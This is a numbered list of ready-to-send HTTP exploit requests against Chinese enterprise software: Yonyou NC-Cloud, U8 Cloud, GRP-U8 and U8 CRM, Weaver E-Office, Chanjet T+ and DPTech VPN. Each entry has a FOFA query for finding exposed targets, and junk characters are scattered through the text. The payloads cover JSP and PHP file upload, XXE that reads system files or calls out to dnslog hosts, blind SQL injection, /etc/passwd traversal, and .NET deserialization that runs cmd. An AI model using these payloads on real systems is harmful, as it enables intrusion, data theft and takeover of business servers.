4 u$ y% h0 P" n2 U3 ~+ `) w9 ~. t35. 用友NC-Cloud importhttpscer任意文件上传
6 w" v2 Y! }$ A( u) \, t# n/ ~) fFOFA:app="用友-NC-Cloud"
4 U/ {9 ^" n' O) v9 I7 `! }POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1! f& M% X6 k" H: Y5 H
Host: 203.25.218.166:8888$ @$ n. }& K, J+ i
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
( ]. T7 ?6 J0 C/ hAccept-Encoding: gzip, deflate
3 T, b, h. t* @3 z$ P7 a9 iAccept: */*& s/ v7 z7 R- N, N
Connection: close
" C' L- V# ?4 T' X/ Z- MaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+ ~/ q4 {/ `# T: H! ?% cContent-Length: 190$ _# O* x5 r+ K/ j W
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
5 ^9 j& v! Q7 n% Z6 @) [- z' i& A# Y: A
--fd28cb44e829ed1c197ec3bc71748df0+ Z' v8 x7 l8 N/ g6 w8 G
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
" }& \. W) J5 v% c
3 a! S; |+ E" ~( T<%out.println(1111*1111);%>
" x+ K: E) q$ A& B) y! n) ]--fd28cb44e829ed1c197ec3bc71748df0--# a/ W) a6 K5 M6 R" I _8 b
x; m% k7 `0 }; B7 B
0 I O6 ~4 M* u" s% _$ j36. 用友NC-Cloud soapFormat XXE. Z4 V i' w ?9 o1 G3 f1 m
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
3 l- W1 D6 c7 I$ ePOST /uapws/soapFormat.ajax HTTP/1.1
( b5 {* m6 l' y8 HHost: 192.168.40.130:89890 E6 {# x, X1 R. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.07 V2 j W6 v6 I: w
Content-Length: 263
/ J' [% r! M: `3 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 z( x2 b5 H- y' n3 \( O* u1 RAccept-Encoding: gzip, deflate9 {6 u' [- O0 z9 e4 N0 o H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 Q a" m, I; e0 t& M+ Y$ H1 G
Connection: close$ C$ @" I% w, z; U9 S! h0 \7 z0 k
Content-Type: application/x-www-form-urlencoded
u2 x9 p2 T3 U7 dUpgrade-Insecure-Requests: 1
+ O' X6 T: ?- L7 I- b, q8 f: p5 ]
2 @% R/ ]8 D% {+ z+ ^6 y, e% _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
: V! k, N6 E& Y: T0 V. o
/ s; B& |% a5 @- A; k, o Q2 J1 U) s
& u/ W& z. z% }/ s+ ^37. 用友NC-Cloud IUpdateService XXE
" E( V# _4 |; i$ p6 ?FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"& e6 Y! n" }: J6 c
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ }3 m0 i3 n6 ?5 yHost: 192.168.40.130:8989$ S; A3 U u; v- n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
- w, N2 N0 s+ ~3 A, B/ DContent-Length: 421
. X+ F& y- T$ E- |: tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# J3 D8 g9 I o4 J1 ]Accept-Encoding: gzip, deflate5 J" y' E: P5 U; L5 I
Accept-Language: zh-CN,zh;q=0.9
+ {. v0 L4 a# C# n+ Y2 ~$ {Connection: close
+ A5 M% U0 e% Z! s8 K7 XContent-Type: text/xml;charset=UTF-8
) c' S W" M! X6 r3 G( ]1 [SOAPAction: urn:getResult: `7 |8 y: S, v d4 m
Upgrade-Insecure-Requests: 10 N0 B. [/ C8 P+ w" X
/ X# T- W# L" O- k l! p
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">6 l" Z, M7 a% A0 p
<soapenv:Header/>: k6 k$ L' k% n d" O+ U L6 K _. K @
<soapenv:Body>- E% F: e9 T; o' l% o7 D! U
<iup:getResult>
4 e& y* T' j4 O" ^' w9 l<!--type: string-->) {$ d1 l: q. w) e& ^$ x) A
<iup:string><![CDATA[4 K0 G! z2 B: {0 g
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>& _, A. F; l$ j7 G+ ^+ s! E, c2 a
<xxx/>]]></iup:string>
6 S0 F' ?# }6 G3 f& f2 K9 l: W U5 X</iup:getResult>
% v2 i- m( a% J8 P</soapenv:Body># c- z# h2 `% @. y( r- d' {! z
</soapenv:Envelope>9 x4 w' o; i0 v$ o1 I. R6 d, l% Z' ^& J
4 |7 |8 {! c: U- ~* F1 {) Q+ Q* F. e* ^2 ^# b
, I: O1 |: l/ r38. 用友U8 Cloud smartweb2.RPC.d XXE
& q2 `' }7 u1 g+ |0 I4 j0 ^FOFA:app="用友-U8-Cloud"
, n. r. Y! [3 A9 d, n% bPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
7 k1 C f' w! e, [Host: 192.168.40.131:8088( @, x4 X+ c7 d; v7 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.258 S% r! j4 v( s8 F+ d9 f( ~) g
Content-Length: 260( ]! s8 i5 G* ]1 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b39 B; H4 |5 ~& c6 E$ j# u% `
Accept-Encoding: gzip, deflate
# ]1 |2 D! [* H, h5 HAccept-Language: zh-CN,zh;q=0.9. W8 f' T; W1 v' {# {1 f
Connection: close! f# K& T& w4 S% \0 m, b3 s4 b
Content-Type: application/x-www-form-urlencoded" N; C& r1 x7 g, u V
2 _+ ?6 g$ Q. x% c__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>8 D x6 d* O+ E2 O+ q" y/ y) c
- b n5 E1 g, T6 q; s4 E0 o( d6 s- y9 ^8 W: a7 @5 A
39. 用友U8 Cloud RegisterServlet SQL注入) M2 \1 {) F- I
FOFA:title="u8c"3 A: Y% ?, }0 X
POST /servlet/RegisterServlet HTTP/1.1
+ o2 M) h" Y9 v2 i9 W' WHost: 192.168.86.128:8089
. x: E" {, J( R7 S1 z* vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& X! j- H3 C- P5 L& k+ w' N; [+ ?
Connection: close# K$ u* Q- B- j+ B. p) Y
Content-Length: 85/ B* m8 k) Q" u) L9 [ L( F3 _. F) e
Accept: */*
7 A1 q. c& D2 j; FAccept-Language: en
# u; B5 ?" j* b' i0 T5 dContent-Type: application/x-www-form-urlencoded
3 K! |( `& q. x3 p+ VX-Forwarded-For: 127.0.0.1
" H& x+ U2 w9 ?" Q& jAccept-Encoding: gzip
: y8 }8 x0 F, K* H9 n" v/ d+ }* z E% g9 c) D
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
0 X' n' `/ f5 Y$ y2 y3 X/ ]% Y
/ W4 E2 I7 m5 G& o1 p( a$ J
% [. c- j' ~2 n B' W/ j" Q3 w4 p40. 用友U8-Cloud XChangeServlet XXE
$ |+ O7 s" `" B' S2 WFOFA:app="用友-U8-Cloud"
. e1 z- S9 Q- CPOST /service/XChangeServlet HTTP/1.1! I+ F" U2 j4 K( g
Host: x.x.x.x
" ], ~6 o* y% h2 P8 NUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ j+ c3 v) D8 J9 O+ s& p- HContent-Type: text/xml4 q1 B- P' C* B
Connection: close0 w. }' k' k) \" d3 R/ g5 p
' Q/ J0 M, _# W7 Z8 m6 o) V' u
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
7 A! Z. I5 ~* m0 w7 `0 N% n3 z
' M9 G3 s4 E5 Q0 [& Q5 Y- H w+ x7 q+ h, h0 P1 m/ o
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入7 E, h4 K4 H# k5 e0 u& w% T: ]0 U
FOFA:app="用友-U8-Cloud"
7 L1 p# U1 T2 MGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
& a) Y; o1 i$ `" @/ aHost:
- T1 R/ e6 a* SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 O! ]2 t/ {& o" }' sContent-Type: application/json
9 t0 q6 Q4 b8 Z7 ~) q# T7 }' D: CAccept-Encoding: gzip8 j) r Z* E/ H: B* z
Connection: close
" c! w% K, r0 {& \) [# d S4 V/ X. p2 b" @; v
% s, H8 q* W6 \% J# H42. 用友GRP-U8 SmartUpload01 文件上传/ N; v' E) D7 M( }! V! I
FOFA:app="用友-GRP-U8"
# |3 J x- |! g# v: g8 N3 oPOST /u8qx/SmartUpload01.jsp HTTP/1.19 B1 K! ]& f- p) _$ j
Host: x.x.x.x
- g2 M7 o# ^$ kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ ?/ w" K, r4 p8 }3 Z& p: G$ oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.364 N) U; G3 z. h* p& s1 r S `* i. \
' |1 G( j' r8 G) _7 _ |0 z
PAYLOAD9 \' s ~9 J' x3 y H8 {8 e5 Z) Y
+ d( ~" U/ C( D! ^- n
% o2 G# V4 H& U$ Y; E6 {5 khttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml( o* E+ a: B6 \2 u4 b9 F; Q* J+ I/ O
# Y. N* d0 h* A) e( i! a' s% Z [43. 用友GRP-U8 userInfoWeb SQL注入致RCE
" N# R5 `% k1 m# D* z- q, U: IFOFA:app="用友-GRP-U8"
2 {/ ^3 q. B; w* R4 A3 [+ ]6 l' dPOST /services/userInfoWeb HTTP/1.1
; _( ?+ i( P: {8 E! f4 w2 f* q5 _7 r! tHost: your-ip
' q5 e6 V; u5 T* \3 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 c+ t; L6 C# }2 o7 a4 S! i6 m* GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 Z( U( d+ `: M, J0 P% ~Accept-Encoding: gzip, deflate5 ?! K; \, R$ q3 {. ]( Q. G3 ~5 p
Accept-Language: zh-CN,zh;q=0.9% l: G( x: X8 @2 [# {
Connection: close8 w( i1 H/ k0 k) o$ n
SOAPAction:
& Q: T+ w' r" t! s: }8 m6 M7 {Content-Type: text/xml;charset=UTF-8# e c( `7 `3 M4 L- W! l
# t+ T5 K: j* f( K5 j1 [" R4 P
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
0 L) a/ x/ S& m0 n <soapenv:Header/>. Q4 U1 @* e% G- ~1 `
<soapenv:Body>) b. a, c8 m8 V. ?* q; n1 x
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">- R2 u' j. {0 o! I2 c) x: q
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
/ f2 u1 Y" L- m9 T/ R2 G </ser:getUserNameById>* p2 I2 {/ q: W) k1 V2 C
</soapenv:Body>& p2 {( z- a9 Y1 @9 e/ e2 U
</soapenv:Envelope>- R. n# C3 [' M8 p" J
, A8 r: B6 n' f; S$ {
0 n7 M5 D9 T: D44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ ^/ q# c( S) r1 X3 l/ Z, c* qFOFA:app="用友-GRP-U8"" L7 h. y) Y; |. ~! _2 b
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
; _% [9 c& S/ m9 E VHost: your-ip% ^! F @6 H7 n S' Q0 r! _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
0 }7 O6 G9 H2 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 U6 s5 V. r) O$ d) _% KAccept-Encoding: gzip, deflate d; M, e6 U3 M0 w( m
Accept-Language: zh-CN,zh;q=0.9
0 x% z/ S9 l1 c$ E; }Connection: close
/ b% O" \. y! j- _% O9 m$ g5 g- d Y
' w% T& f {: [8 M/ u% G$ w7 N45. 用友GRP-U8 ufgovbank XXE
1 q1 T1 q8 `, |+ VFOFA:app="用友-GRP-U8"
- {- d" J! ` J0 {" [# }; fPOST /ufgovbank HTTP/1.1, @( M7 b1 `; P; M1 q! m5 p
Host: 192.168.40.130:2226 `9 W, i( ]. j& _) n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
2 o+ e0 H% h3 a2 u9 X7 N8 P; C# vConnection: close
7 S0 h+ f& w* B. M% ]Content-Length: 1613 ]3 {* ]9 @6 D8 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 v* W+ N' V3 `( R5 _0 v2 }! R6 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! `% }' {) g- F! U) e* g. l) J1 `Content-Type: application/x-www-form-urlencoded( X0 H2 O/ ~( p2 F& x: F5 J
Accept-Encoding: gzip+ L0 t3 Y6 c8 |' a8 M
1 Z7 r1 C* s- X
reqData=<?xml version="1.0"?>0 t5 L, C/ @" k6 r9 R
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest s2 x7 {$ p6 t6 O
- t; a/ F1 U1 f6 V' ^
3 O8 Z( k- t6 [0 `( u: U/ I7 a( w46. 用友GRP-U8 sqcxIndex.jsp SQL注入
" d, s+ u4 G$ H c. N9 O' IFOFA:app="用友-GRP-U8": q/ r6 v3 c, C6 a& h0 Q: i x7 F
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
& T0 U ^* [" ~9 v* z9 U! tHost: your-ip/ j ~3 S+ w/ T4 _/ n( v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
$ L6 m" }: }3 j( L; jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Z5 v0 d. u) k# i4 z! [3 m+ NAccept-Encoding: gzip, deflate
, O% I( P2 E& ~; P% UAccept-Language: zh-CN,zh;q=0.94 r2 ? B. p. s; Y7 ]
Connection: close
" N3 W6 b! V' C9 L$ U0 Q" y* Q t4 R3 Q+ }" u
3 E* A$ v/ R5 k/ _1 \47. 用友GRP A++Cloud 政府财务云 任意文件读取. @- r7 [- n. s4 O' @
FOFA:body="/pf/portal/login/css/fonts/style.css"
9 m/ F9 _# _& o' WGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
J+ q+ U" A$ `* G# A0 b- _+ uHost: x.x.x.x
/ d+ P0 q1 H- iCache-Control: max-age=0( H* l" ?5 J3 r+ ~
Upgrade-Insecure-Requests: 18 d7 G! N b) _' r* \7 q3 D9 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% w- `* V- [' [$ c0 |' HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( B4 X/ Z& D0 d: s4 nAccept-Encoding: gzip, deflate, br
% E- c9 B. K# ~7 C9 C WAccept-Language: zh-CN,zh;q=0.90 P" i9 W7 N! u$ t
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT; D9 k4 X7 n- n' |% l( {" i
Connection: close
7 ]% }/ k; e) @& s1 R4 n' f
- m$ ^3 p' K' \: u
2 G+ A4 W9 m8 J: N- K! L! D0 G
/ i% B9 s- P! ?+ M' V2 o5 Y48. 用友U8 CRM swfupload 任意文件上传
1 s, J Q% m" }: |( c& t# hFOFA:title="用友U8CRM"
' i! ^; G7 r) o. ?8 C( K6 {6 wPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1) @) z8 z' d' s" w1 L7 q3 E
Host: your-ip
: y- c- I8 j: ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
, h+ E7 d4 l" U% kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ r3 |/ S- ]4 C s+ P; C6 l" ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' S, x- ?/ ^3 aAccept-Encoding: gzip, deflate3 W" K7 b5 l0 _6 A6 S9 ~& w
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668558 R" R$ ~* r" n8 P
------269520967239406871642430066855; W ~4 K5 M. _" l, w1 m- G* |
Content-Disposition: form-data; name="file"; filename="s.php"3 @+ A5 [! \$ b. W1 L
1231
3 E$ `! P- a) \) k- \4 T# _8 YContent-Type: application/octet-stream
8 h$ H, o4 z) n( |' V6 i8 ~------269520967239406871642430066855
+ w7 P; R7 i. F% MContent-Disposition: form-data; name="upload"
2 u6 C# H& u2 y2 Bupload9 A$ w8 \3 i4 c9 n6 H
------269520967239406871642430066855--* A H6 ~* Q/ ]! e& U% n
" i( D5 x2 {5 D. I h# y: a3 L/ K' P$ X* k
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
% X0 ?( @" |7 ?! ~+ R+ dFOFA:body="用友U8CRM"' c' a2 s4 r$ a9 {
' q4 e9 Q% J$ k; E' Z! @$ S' F) k
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1" ]4 j* h1 i3 C- b( F; Z
Host: x.x.x.x
2 g& f4 r* o* F8 j4 ?! w4 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: a/ }+ a5 K! _9 d' [* v
Content-Length: 329) I# H3 B1 l0 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
k C/ c( ?; o+ ^. I+ E1 w# I+ C6 zAccept-Encoding: gzip, deflate
1 @$ ~0 G* G/ J! l% _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ O( v; }( N) x0 e: P% z1 pConnection: close; p' y4 p! f( y; C# M0 r
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
2 i6 F$ I k# `- N: q7 [- w9 k
% L: A- l1 F% [; L) a. z-----------------------------vvv3wdayqv3yppdxvn3w8 K9 R: t1 L0 r3 P+ c
Content-Disposition: form-data; name="file"; filename="%s.php "7 ]( c5 c- K2 m; I6 I6 w' g
Content-Type: application/octet-stream9 D9 `9 B6 `' B2 ~3 i1 i7 v) \9 p
3 l" F+ y( @$ K7 h: [$ h
wersqqmlumloqa3 h" {* t$ U0 j! q3 f
-----------------------------vvv3wdayqv3yppdxvn3w' t9 `: z) ]2 c7 v0 e' ]6 {
Content-Disposition: form-data; name="upload") @2 j/ D+ E" k) z1 m
* H5 N8 @7 T" k& e8 tupload
& Z+ p+ n `& l' a- X# ^" o% O-----------------------------vvv3wdayqv3yppdxvn3w--
* s4 ?& }- X3 R, ] I1 y% E4 B% W$ z2 @+ c0 r* B. k' l
# W+ H# ]" u! }4 thttp://x.x.x.x/tmpfile/updB3CB.tmp.php
$ I2 D4 }7 f( E
# V% Y) j* f& y, ?! \# i8 s) F. m50. QDocs Smart School 6.4.1 filterRecords SQL注入2 G- F- B, ~% Z# s9 Z5 O( D
FOFA:body="close closebtnmodal"
& u- Y7 y0 o4 f& g5 VPOST /course/filterRecords/ HTTP/1.14 o- d3 K" \, k" Q2 X* p
Host: x.x.x.x. M& r6 l) b& K5 ^/ j3 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 q! Z; Z" n5 N2 \# P, s9 I* m0 a* c
Connection: close% Z' J/ u. z( }* o* |
Content-Length: 224
8 d2 C. f2 F; ]: bAccept: */*5 L0 @ J+ H2 G6 c2 x/ J: u
Accept-Language: en F/ _# }# B. }4 p/ s: n3 {! ]
Content-Type: application/x-www-form-urlencoded4 H6 U: Q3 s" C
Accept-Encoding: gzip! L4 R) F4 b. l6 \0 ^! ~
8 A2 S) | P0 I( t, @! f# fsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
, N; \7 z7 n: k2 Z2 |' t
: ?/ d4 l* F, _8 T, q! f# ~0 q( i9 [$ `9 o/ C2 o8 w- O6 Q* }% j
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, J2 d7 y* a9 F; ~9 q
FOFA:app="云时空社会化商业ERP系统"1 N+ ~3 `1 w' i0 I+ q2 n1 b* w
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. j3 i3 ~" x% Z+ h A. }Host: your-ip
1 }5 V3 m# E6 g Y! s3 \User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
3 h/ i8 } v/ D7 C! zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! V: L+ h! _+ c. p8 tAccept-Encoding: gzip, deflate" C- U9 e4 \# g; z6 L
Accept-Language: zh-CN,zh;q=0.9) u$ _9 `( }3 B. m
Connection: close- N) o2 Q/ h( p7 `
6 Y( j2 w8 k1 D& q6 Y
1 w. j) X, a0 O$ W8 l; i52. 泛微E-Office json_common.php sql注入, O; I |2 k, y$ |9 I7 S
FOFA:app="泛微-EOffice"
F- O* |1 {) ^; X4 kPOST /building/json_common.php HTTP/1.1
+ \' `5 H" Z2 R/ lHost: 192.168.86.128:8097* Z2 A% y+ [" M/ O5 ]! u
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ a$ l6 i$ }) N% J4 t5 yConnection: close
0 I# X. ]5 W5 d# ~: Z; jContent-Length: 87( t A$ a1 _% B' b2 a
Accept: */*! C9 {7 n1 R" J5 K; a8 J" S) D
Accept-Language: en M m) Y7 [+ ^ Z+ y! P2 @. y0 b$ F, Y
Content-Type: application/x-www-form-urlencoded$ H7 S4 w2 ?/ i# u! r
Accept-Encoding: gzip; x) o* e0 _% q6 Q1 Y( {1 P
2 b2 e7 x6 A' A+ ?& P7 j
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
& |7 f" g% i7 p* y7 Q# N7 T: Y' A! O
/ b$ w8 m. O0 e* {* C# U0 m% e" U; y$ i$ j& g
53. 迪普 DPTech VPN Service 任意文件上传
# O1 G5 ^1 r4 h6 LFOFA:app="DPtech-SSLVPN" ^0 E; k9 D8 T% C8 V2 p. V8 L
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd8 `7 G! f, h3 x5 N
( ^" }: W7 R, C+ v( Z
4 l/ c5 X! H6 h7 z, k5 V; T# Z, N
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
) [; ~$ i; i X, {; F& RFOFA:app="畅捷通-TPlus"
" X ^% n1 \' N) j* H: o: ?第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件' y- g; ?% G- y d
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
2 }) I `1 z2 Q5 v: i# C6 x- W& t
5 Q) x# ~+ p2 L y! u, D' f4 P0 D- I
完整数据包
6 p; @' a( a- ZPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: T7 K" \; M+ d) |- C1 ~' RHost: x.x.x.x" v6 d% X0 N r1 y& z4 W; A
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
- [ ^0 N' R# a& M3 C8 BContent-Length: 593 y$ F2 J1 Q5 L+ ~4 c, \
5 \- Q1 o6 i6 B: y1 f. @& S4 K) ]{2 `5 a# j4 {/ O, p7 N, k7 T9 Y
"storeID":{
7 r2 N1 W; F& |5 C: E+ |& l "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
" ?8 I5 b t4 G4 u "MethodName":"Start",
3 Z$ B2 p1 Y+ P, q7 w3 m& h "ObjectInstance":{; Y2 A4 ^- V) z+ w. {7 y- q
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) t6 y' q. P g- b. G3 c, t "StartInfo":{
8 o: i- ~, W0 o; s8 k "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' g! d( |. t, J7 c8 k( {6 Q "FileName":"cmd",
) e5 `' a/ u8 c7 G5 W "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
! S% i `. B. H }
9 z- s9 z& l! ]) m$ W/ z, h }- b, x f) J \" q
}
0 V! C" t: S2 Z: F/ M% z# e}
$ E- Q! D/ L- B# E7 B8 l
. I; r$ N8 |% {5 ~# q( N, L0 h" j+ M* Q% {4 h6 e
第二步,访问如下url
) Y3 {& O& e! m$ h6 y4 J/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt' u% w- V/ H" J% Q; a; O
* J% v9 V4 Y; Q2 ]! n0 }9 E- E+ |
% c& ^: K9 I+ F. x55. 畅捷通T+ getdecallusers信息泄露
5 A C' v: D; g7 Q2 E8 EFOFA:app="畅捷通-TPlus"4 s4 E" I% |% O
第一步,通过
) g! \6 w8 n; ~% J. t/ C9 O$ ?7 T/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie. J4 a5 c9 e% n
第二步,利用获取到的Cookie请求9 f3 k8 L8 J' M3 O( M- q
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
( q: j0 ?0 T+ q# [% S* B# \+ w* u4 U" c! L- h
